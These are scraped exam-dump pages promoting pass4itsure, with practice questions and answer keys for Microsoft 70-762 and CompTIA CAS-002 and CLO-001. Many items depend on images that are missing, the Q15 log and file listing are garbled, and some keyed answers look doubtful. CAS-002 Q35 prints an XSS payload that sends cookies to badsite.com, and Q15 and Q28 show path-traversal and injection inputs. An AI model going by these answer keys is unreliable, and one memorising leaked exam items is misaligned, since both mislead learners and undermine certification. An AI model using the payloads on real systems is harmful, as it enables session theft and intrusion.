pass4itsure 70-762 exam question q9-1

 

QUESTION 10
Note: This question is part of a series of questions that present the same scenario. Each question in this series contains
a unique solution. Determine whether the solution meets the stated goals.
Your company has employees in different regions around the world. You need to create a database table that stores the
following employee attendance information: Employee ID date and time employee checked in to work date and time
employee checked out of work
Date and time information must be time zone aware and must not store fractional seconds.
Solution: You run the following Transact-SQL statement:pass4itsure 70-762 exam question q10

Does the solution meet the goal?
A. Yes
B. No
Correct Answer: A
Datetimeoffset defines a date that is combined with a time of a day that has time zone awareness and is based on a
24-hour clock.
Syntaxis: datetimeoffset [ (fractional seconds precision) ]
Forthe use “datetimeoffset(0)”, the Fractional seconds precision is 0, which is required here.
References: https://msdn.microsoft.com/en-us/library/bb630289.aspx

 

QUESTION 11
Note: This question is part of a series of questions that present the same scenario. Each question in this series contains
a unique solution. Determine whether the solution meets the stated goals. The Account table was created using the
following Transact-SQL statement:pass4itsure 70-762 exam question q11

There are more than 1 billion records in the Account table. The Account Number column uniquely identifies each
account. The ProductCode column has 100 different values. The values are evenly distributed in the table. Table
statistics are refreshed and up to date.
You frequently run the following Transact-SQL SELECT statements:

pass4itsure 70-762 exam question q11-1

You must avoid table scans when you run the queries. You need to create one or more indexes for the table. Solution:
You run the following Transact-SQL statement:

pass4itsure 70-762 exam question q11-2

Does the solution meet the goal?
A. Yes
B. No
Correct Answer: B
Create a clustered index on the AccountNumber column as it is unique, not a nonnonclustered one.
References: https://msdn.microsoft.com/en-us/library/ms190457.aspx

 

QUESTION 12
You have a database that contains three encrypted stored procedures named dbo. Proc1, dbo.Proc2 and dbo.Proc3. The
stored procedures include INSERT, UPDATE, DELETE, and BACKUP DATABASE statements. You have the following
requirements:
-You must run all the stored procedures within the same transaction.
-You must automatically start a transaction when stored procedures include DML statements.
-You must not automatically start a transaction when stored procedures include DDL statements.
You need to run all three stored procedures.
Which four Transact-SQL segments should you use to develop the solution? To answer, move the appropriate Transact-
SQL segments to the answer area and arrange them in the correct order.
Select and Place:pass4itsure 70-762 exam question q12

Correct Answer:

pass4itsure 70-762 exam question q12-1

Note:
Implicit transaction mode remains in effect until the connection executes a SET IMPLICIT_TRANSACTIONS OFF
the statement, which returns the connection to auto-commit mode. In auto-commit mode, individual statements are
committed if
they complete successfully.

pass4itsure 70-762 exam question q12-2

When a connection is in implicit transaction mode and the connection is not currently in a transaction, executing any of
the following statements starts a transaction:
Note 2: XACT_STATE returns the following values.
1 The current request has an active user transaction. The request can perform any actions, including writing data and
committing the transaction. The transaction is committable.
-1 The current request has an active user transaction, but an error has occurred that has caused the transaction to be
classified as an uncommittable transaction. the transaction is uncommittable and should be rolled back.
0 There is no active user transaction for the current request. A commit or rollback operation would generate an error.
References:
https://technet.microsoft.com/en-us/library/ms187807(v=sql.105).aspx https://technet.microsoft.com/en-
us/library/ms189797(v=sql.110).aspx

 

QUESTION 13
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution. Determine whether the solution meets the stated goals.
You have a database that contains a table named Employees. The table stores information about the employees of your
company.
You need to implement and enforce the following business rules:
Limit the values that are accepted by the Salary column.
Prevent salaries less than $15,000 and greater than $300,000 from being entered.
Determine valid values by using logical expressions.
Do not validate data integrity when running DELETE statements.
Solution: You implement a foreign key on the table. Does the solution meet the goal?
A. Yes
B. No
Correct Answer: B
A check constraint is needed.
References: https://en.wikipedia.org/wiki/Check_constraint

The latest Microsoft MCSA 70-762 dumps help you get on the ladder of success! Get the latest updates from the 70-762 exam: https://www.pass4itsure.com/70-762.html (Q&As: 164) For more effective exam dumps,
follow me!

Pass4itsure Promo Code 15% Off

pass4itsure 70-762 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the Microsoft 70-762 exam. Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass 70-762 exam easily at first try.

why pass4itsure 70-762 dumps

Maybe you might like the exam questions and answers

CompTIA CASP CAS-002 exam dumps, real and effective CAS-002 practice test

vcekey shares the latest effective CompTIA CASP CAS-002 exam questions and answers, all of our free content from pass4itsure
experts, our experts are trustworthy, all exam content follows realistic exam questions and answers, These questions and
answers are updated frequently to ensure that you pass the CAS-002 exam at once. If you want to get the certificate easily
please select: https://www.pass4itsure.com/CAS-002.html VCE exam dumps or PDF exam Dumps. If you are only interested in
online knowledge, please pay attention to vcekey.com. We will insist on updating free content

[PDF] Free CompTIA CASP CAS-002 dumps download from Google Drive:
https://drive.google.com/open?id=1XtNqdc3hoH8oIPv6v6zooD59IRVPW81t

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

(CASP) Advanced Security Practitioner Certification | CompTIA IT Certifications:https://certification.comptia.org/certifications/comptia-advanced-security-practitioner

About the CAS-002 exam:

The CompTIA Advanced Security Practitioner certification validates advanced-level competency in risk management; enterprise security
operations and architecture; research and collaboration; and integration of enterprise security. Successful candidates will have
the knowledge required to:

Enterprise Security domain expanded to include operations and architecture concepts, techniques, and requirements
More emphasis on analyzing risk through interpreting trend data and anticipating cyber defense needs to meet business goals
Expanding security control topics to include Mobile and small form factor devices, as well as software vulnerability
Broader coverage of integrating cloud and virtualization technologies into a secure enterprise architecture
Inclusion of implementing cryptographic techniques, such as Blockchain- Cryptocurrency and Mobile device encryption
The new CompTIA CASP CAS-003 exam is available as of April 2, 2018.

Pass4itsure offers the latest CompTIA CASP CAS-002 practice test free of charge (50Q&As)

QUESTION 1
A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate
the overall effectiveness of antivirus across the entire organization. Which of the following tools can BEST meet the CISO’s requirement?
A. GRC
B. IPS
C. CMDB
D. Syslog-ng
E. IDS
Correct Answer: A
Explanation

QUESTION 2
Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to
do the required level of encryption. Which of the following solutions minimizes the performance impact on the router?
A. Deploy inline network encryption devices
B. Install an SSL acceleration appliance
C. Require all core business applications to use encryption
D. Add an encryption module to the router and configure IPSec
Correct Answer: A
Explanation

QUESTION 3
The source workstation image for new accounting PCs has begun blue-screening. A technician notices that the date/time stamp of the image source appears to have changed. The desktop support director has asked the Information Security
department to determine if any changes were made to the source image. Which of the following methods would BEST help with this process? (Select TWO).
A. Retrieve source system image from backup and run file comparison analysis on the two images.
B. Parse all images to determine if extra data is hidden using steganography.
C. Calculate a new hash and compare it with the previously captured image hash.
D. Ask desktop support if any changes to the images were made.
E. Check key system files to see if date/time stamp is in the past six months.
Correct Answer: AC
Explanation

QUESTION 4
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer
released. Additionally, this is a proprietary embedded system and little is documented and known about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this
system?
A. Virtualize the system and migrate it to a cloud provider.
B. Segment the device on its own secure network.
C. Install an antivirus and HIDS on the system.
D. Hire developers to reduce vulnerabilities in the code.
Correct Answer: B
Explanation

QUESTION 5
An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-
party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via
the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select
THREE).
A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting
Correct Answer: CEF
Explanation

QUESTION 6
The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP
phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management’s directives?
A. Develop an information classification scheme that will properly secure data on corporate systems.
B. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment.
C. Publish a policy that addresses the security requirements for working remotely with company equipment.
D. Work with mid-level managers to identify and document the proper procedures for telecommuting.
Correct Answer: C
Explanation

QUESTION 7
A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news?
A. Update company policies and procedures
B. Subscribe to security mailing lists
C. Implement security awareness training
D. Ensure that the organization vulnerability management plan is up-to-date
Correct Answer: B
Explanation

QUESTION 8
A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing
maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service provider’s relationship?
A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement
Correct Answer: B
Explanation

QUESTION 9
A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).
A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items
Correct Answer: DE
Explanation

QUESTION 10
The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configurationprocesses, and support incident reconstruction. Which of the following designs BEST supports the given requirements?
A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator.
B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.
C. A SaaS based firewall which logs to the company’s local storage via SSL, and is managed by the change control team.
D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.
Correct Answer: A
Explanation

QUESTION 11
Which of the following provides the BEST risk calculation methodology?
A. Annual Loss Expectancy (ALE) x Value of Asset
B. Potential Loss x Event Probability x Control Failure Probability
C. Impact x Threat x Vulnerability
D. Risk Likelihood x Annual Loss Expectancy (ALE)
Correct Answer: B
Explanation

QUESTION 12
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:
[email protected]:~$ sudo nmap -O 192.168.1.54
Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:
TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778
Based on this information, which of the following operating systems is MOST likely running on the unknown node?
A. Linux
B. Windows
C. Solaris
D. OSX
Correct Answer: C
Explanation
Explanation/Reference:

QUESTION 13
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST
important?
A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks
Correct Answer: A
Explanation

QUESTION 14
A company sales manager received a memo from the company’s financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and
development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the
upcoming year and identified an increased target across the software products that will be affected by the financial department’s change. All software products will continue to go through new development in the coming year. Which of the
following should the sales manager do to ensure the company stays out of trouble?
A. Discuss the issue with the software product’s user groups
B. Consult the company’s legal department on practices and law
C. Contact senior finance management and provide background information
D. Seek industry outreach for software practices and law
Correct Answer: B
Explanation

QUESTION 15
The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an
account with SELECT only privileges.
Web server logs show the following:
90.76.165.40 — [08/Mar/2014:10:54:04] “GET calendar.php?create%20table%20hidden HTTP/1.1” 200 5724
90.76.165.40 — [08/Mar/2014:10:54:05] “GET ../../../root/.bash_history HTTP/1.1” 200 90.76.165.40 ?- [08/Mar/2014:10:54:04] “GET index.php?user<;scrip>;Creat<;/scrip>; HTTP/1.1” 200 5724
The security administrator also inspects the following file system locations on the database server using the command `ls -al /root’
drwxrwxrwx 11 root root 4096 Sep 28 22:45 .
drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..
-rws—— 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .profile
-rw——- 25 root root 4096 Mar 8 09:30 .ssh
Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).
A. Privilege escalation
B. Brute force attack
C. SQL injection
D. Cross-site scripting
E. Using input validation, ensure the following characters are sanitized: <>
F. Update crontab with: find / \( -perm -4000 \) –type f –print0 | xargs -0 ls –l | email.sh
G. Implement the following PHP directive: $clean_user_input = addslashes($user_input)
H. Set an account lockout policy
Correct Answer: AF
Explanation
Explanation/Reference:

QUESTION 16
A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is the NEXT step that the security team should take?
A. Purchase new hardware to keep the malware isolated.
B. Develop a policy to outline what will be required in the secure lab.
C. Construct a series of VMs to host the malware environment.
D. Create a proposal and present it to management for approval.
Correct Answer: D
Explanation

QUESTION 17
Company XYZ provides cable television service to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. The telephone and Internet services
portions of the company will each be separate subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries separate from the parent company. However all three companies must share customer data for the
purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while only sharing minimal data between the companies. Which of the following solutions is
BEST suited for this scenario?
A. The companies should federate, with the parent becoming the SP, and the subsidiaries becoming an IdP.
B. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SSP.
C. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SP.
D. The companies should federate, with the parent becoming the ASP, and the subsidiaries becoming an IdP.
Correct Answer: C
Explanation

QUESTION 18
The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training
course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement?
A. Avoid
B. Accept
C. Mitigate
D. Transfer
Correct Answer: C
Explanation

QUESTION 19
A completely new class of web-based vulnerabilities has been discovered. Claims have been made that all common web-based development frameworks are susceptible to attack. Proof-of-concept details have emerged on the Internet. A
security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of the following BEST describes how the security advisor should respond?
A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
B. Hire an independent security consulting agency to perform a penetration test of the web servers. Advise management of any `high’ or `critical’ penetration test findings and put forward recommendations for mitigation.
C. Review vulnerability write-ups posted on the Internet. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software.
D. Notify all customers about the threat to their hosted data. Bring the web servers down into “maintenance mode” until the vulnerability can be reliably mitigated through a vendor patch.
Correct Answer: A
Explanation

QUESTION 20
A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement
is BEST described as an implementation of:
A. an administrative control
B. dual control
C. separation of duties
D. least privilege
E. collusion
Correct Answer: C
Explanation

QUESTION 21
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor
corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates.
B. Implementation of an offsite data center hosting all company data, as well as deployment of VDI for all client computing needs.
C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.
Correct Answer: D
Explanation

QUESTION 22
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the
following options increases data availability in the event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
Correct Answer: D
Explanation

QUESTION 23
A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral
devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).
A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.
B. A DLP gateway should be installed at the company border.
C. Strong authentication should be implemented via external biometric devices.
D. Full-tunnel VPN should be required for all network communication.
E. Full-drive file hashing should be implemented with hashes stored on separate storage.
F. Split-tunnel VPN should be enforced when transferring sensitive data.
Correct Answer: BD
Explanation

QUESTION 24
An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should
the company ensure is supported by the third-party? (Select TWO).
A. LDAP/S
B. SAML
C. NTLM
D. OAUTH
E. Kerberos
Correct Answer: BE
Explanation

QUESTION 25
A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. The Chief Information Office has become
increasingly frustrated with frequent releases, stating that the organization needs everything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant
communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Which of the following methods of software development is this organization’s
configuration management process using?
A. Agile
B. SDL
C. Waterfall
D. Joint application development
Correct Answer: A
Explanation

QUESTION 26
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due
to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
Correct Answer: E
Explanation

QUESTION 27
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery
firm where chain of custody is important, which of the following scenarios should they consider?
A. Offload some data processing to a public cloud
B. Aligning their client intake with the resources available
C. Using a community cloud with adequate controls
D. Outsourcing the service to a third party cloud provider
Correct Answer: C
Explanation

QUESTION 28
select id, firstname, lastname from authors
User input= firstname= Hack;man
lastname=Johnson
Which of the following types of attacks is the user attempting?
A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection
Correct Answer: D
Explanation

QUESTION 29
A network administrator with a company’s NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company’s physical security, which of the following can the network administrator use to detect the
presence of a malicious actor physically accessing the company’s network or information systems from within? (Select TWO).
A. RAS
B. Vulnerability scanner
C. HTTP intercept
D. HIDS
E. Port scanner
F. Protocol analyzer
Correct Answer: DF
Explanation

QUESTION 30
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is
resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?
A. Agile
B. Waterfall
C. Scrum
D. Spiral
Correct Answer: B
Explanation

QUESTION 31
Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?
A. Aggressive patch management on the host and guest OSs.
B. Host based IDS sensors on all guest OSs.
C. Different antivirus solutions between the host and guest OSs.
D. Unique Network Interface Card (NIC) assignment per guest OS.
Correct Answer: A
Explanation

QUESTION 32
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its
employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?
A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they are at home.
Correct Answer: B
Explanation

QUESTION 33
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?
A. Ensure the SaaS provider supports dual factor authentication.
B. Ensure the SaaS provider supports encrypted password transmission and storage.
C. Ensure the SaaS provider supports secure hash file exchange.
D. Ensure the SaaS provider supports role-based access control.
E. Ensure the SaaS provider supports directory services federation.
Correct Answer: E
Explanation

QUESTION 34
A security manager has received the following email from the Chief Financial Officer (CFO):
“While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things
currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?”
Based on the information provided, which of the following would be the MOST appropriate response to the CFO?
A. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed.
B. Allow VNC access to corporate desktops from personal computers for the users working from home.
C. Allow terminal services access from personal computers after the CFO provides a list of the users working from home.
D. Work with the executive management team to revise policies before allowing any remote access.
Correct Answer: D
Explanation

QUESTION 35
A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” + request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cooki e</script>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server.
Which of the following should the security administrator implement to prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
Correct Answer: A
Explanation
Explanation/Reference:

QUESTION 36
An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?
A. Review switch and router configurations
B. Review the security policies and standards
C. Perform a network penetration test
D. Review the firewall rule set and IPS logs
Correct Answer: B
Explanation

QUESTION 37
An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough
review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE).
A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations
F. Marketing
G. Information technology
Correct Answer: AEG
Explanation

QUESTION 38
A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization’s customer database. The database will be accessed by both the company’s users and its
customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select
TWO).
A. Physical penetration test of the datacenter to ensure there are appropriate controls.
B. Penetration testing of the solution to ensure that the customer data is well protected.
C. Security clauses are implemented into the contract such as the right to audit.
D. Review of the organizations security policies, procedures and relevant hosting certifications.
E. Code review of the solution to ensure that there are no back doors located in the software.
Correct Answer: CD
Explanation

QUESTION 39
Which of the following activities is commonly deemed “OUT OF SCOPE” when undertaking a penetration test?
A. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
B. Undertaking network-based denial of service attacks in production environment
C. Test password complexity of all login fields and input validation of form fields
D. Reverse engineering any thick client software that has been provided for the test
Correct Answer: B
Explanation
Explanation/Reference:

QUESTION 40
A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool?
A. The tool could show that input validation was only enabled on the client side
B. The tool could enumerate backend SQL database table and column names
C. The tool could force HTTP methods such as DELETE that the server has denied
D. The tool could fuzz the application to determine where memory leaks occur
Correct Answer: A
Explanation

QUESTION 41
During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the
firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more
appropriate solution?
A. Implement an IPS to block the application on the network
B. Implement the remote application out to the rest of the servers
C. Implement SSL VPN with SAML standards for federation
D. Implement an ACL on the firewall with NAT for remote access
Correct Answer: C
Explanation

QUESTION 42
Which of the following is the BEST place to contractually document security priorities, responsibilities, guarantees, and warranties when dealing with outsourcing providers?
A. SLA
B. MOU
C. OLA
D. NDA
Correct Answer: A
Explanation
Explanation/Reference:

QUESTION 43
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates
that should be purchased?
A. 1
B. 2
C. 3
D. 6Correct Answer: C
Explanation
Explanation/Reference:

QUESTION 44
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and
remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important?
A. What are the protections against MITM?
B. What accountability is built into the remote support application?
C. What encryption standards are used in tracking database?
D. What snapshot or “undo” features are present in the application?
E. What encryption standards are used in remote desktop and file transfer functionality?
Correct Answer: B
Explanation

QUESTION 45
The Chief Executive Officer (CEO) has asked the IT administrator to protect the externally facing web server from SQL injection attacks and ensure the backend database server is monitored for unusual behavior while enforcing rules to
terminate unusual behavior. Which of the following would BEST meet the CEO’s requirements?
A. WAF and DAM
B. UTM and NIDS
C. DAM and SIEM
D. UTM and HSM
E. WAF and SIEM
Correct Answer: A
Explanation

QUESTION 46
A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).
A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items
Correct Answer: DE
Explanation

QUESTION 47
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and
relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to
make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO).
A. Web cameras
B. Email
C. Instant messaging
D. BYOD
E. Desktop sharing
F. Presence
Correct Answer: CE
Explanation

QUESTION 48
A company has decided to move to an agile software development methodology. The company gives all of its developers security training. After a year of agile, a management review finds that the number of items on a vulnerability scan has
actually increased since the methodology change. Which of the following best practices has MOST likely been overlooked in the agile implementation?
A. Penetration tests should be performed after each sprint.
B. A security engineer should be paired with a developer during each cycle.
C. The security requirements should be introduced during the implementation phase.
D. The security requirements definition phase should be added to each sprint.
Correct Answer: D
Explanation

QUESTION 49
CORRECT TEXT
pass4itsure CAS-002 question
Correct Answer: 192.18.1.0/24 any 192.168.20.0/24 3389 any
Explanation
Explanation/Reference:

QUESTION 50
CORRECT TEXT
An administrator wants to install a patch to an application. Given the scenario, download, verify and install the patch in the most secure manner. Instructions The last install that is completed will be the final submission
pass4itsure CAS-002 question
Correct Answer: You need to check the hash value of download software with md5 utility.
Explanation
Explanation/Reference

Conclusion:

Thank you for reading! vcekey.com will insist on doing free content to help more friends who need free content.
If you are ready to obtain a certificate, select: https://www.pass4itsure.com/CAS-002.html VCE exam dump or PDF exam dumps.
We guarantee your easy passage.
(Exam databases are regularly updated throughout the year to include the latest questions and answers from the CompTIA CAS-002 exam)

[PDF] Free CompTIA CASP CAS-002 dumps download from Google Drive:
https://drive.google.com/open?id=1XtNqdc3hoH8oIPv6v6zooD59IRVPW81t

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

Pass4itsure Promo Code 15% Off

pass4itsure CAS-002 coupon

related: https://www.vcekey.com/most-important-cisco-642-385-dumps-exam/

CompTIA Cloud Essentials CLO-001 exam dumps, real and effective CLO-001 practice test

vcekey shares the latest effective CompTIA Cloud Essentials CLO-001 exam questions and answers, all of our free content from pass4itsure
experts, our experts are trustworthy, all exam content follows realistic exam questions and answers, These questions and
answers are updated frequently to ensure that you pass the CLO-001 exam at once. If you want to get the certificate easily
please select: https://www.pass4itsure.com/CLO-001.html VCE exam dumps or PDF exam Dumps. If you are only interested in
online knowledge, please pay attention to vcekey.com. We will insist on updating free content

[PDF] Free CompTIA Cloud Essentials CLO-001 dumps download from Google Drive:
https://drive.google.com/open?id=1Xa1_SjwXyfqPmZBt5wdHqJ5qRfFtojGt

[PDF] Free Full CompTIA dumps download from Google Drive:
https://drive.google.com/open?id=1SnVb1WLCtG5umIgtJ4zeNNSpuAFWZ3yg

CompTIA Cloud Essentials CLO-001 Study Guide:
https://certification.comptia.org/training/self-study/books/comptia-cloud-essentials-clo-001-study-guide

About the CLO-001 exam:

CompTIA Cloud+ validates the skills you need to maintain and optimize cloud infrastructure services.

Cloud+ covers the increased diversity of knowledge, skills and abilities required of system administrators to validate what is necessary
to perform effectively in data center jobs.
CompTIA Cloud+ views cloud-based infrastructure services as an increasingly important piece of an organization’s IT systems.
It is the only vendor-neutral, performance-based certification covering more than a specific vendor or a single function like security or
networking to help you better realize the return on investment of cloud infrastructure services.

Pass4itsure offers the latest CompTIA Cloud Essentials CLO-001 practice test free of charge (39Q&As)

QUESTION 1
Which of the following describes the difference between SaaS and IaaS?
A. SaaS defines a standard while IaaS implements the standard.
B. SaaS enables the software developer while IaaSprovides the specifications.
C. SaaS provides applications while IaaS provides equipment.
D. SaaS implements security while IaaS provides information.
Correct Answer: C

QUESTION 2
Which of the following aspects of public cloud computing would a company MOST likely need to consider
to ensure information security?
A. Data integrity
B. Server type
C. Firewall specifications
D. Network hardware
Correct Answer: A

QUESTION 3
Which of the following is BEST used when setting up security for services being used within a public
cloud?
A. LDAP
B. SFTP
C. SNMP
D. SSL
Correct Answer: D

QUESTION 4
A company Chief Information Officer (CIO) who wants to ensure rapid elasticity for the company’s cloud
solution would MOST likely choose which of the following types of cloud?
A. Public cloud
B. Private community cloud
C. Private cloud
D. Community cloud
Correct Answer: A

QUESTION 5
Which of the following is the function of orchestration services?
A. Assemble functional requirements for application development
B. Configure application clusters with Web services
C. Enable and disable load balancers
D. Manage the starting and stopping of application server clusters
Correct Answer: D

QUESTION 6
Which of the following is true when mitigating risks in a cloud environment while avoiding impact to
performance?A. When securing cloud resources, only the most sensitive data should be secured.
B. When securing cloud resources, it is always a best practice to encrypt all data stored in the cloud.
C. When securing cloud resources, data security is not an issue.
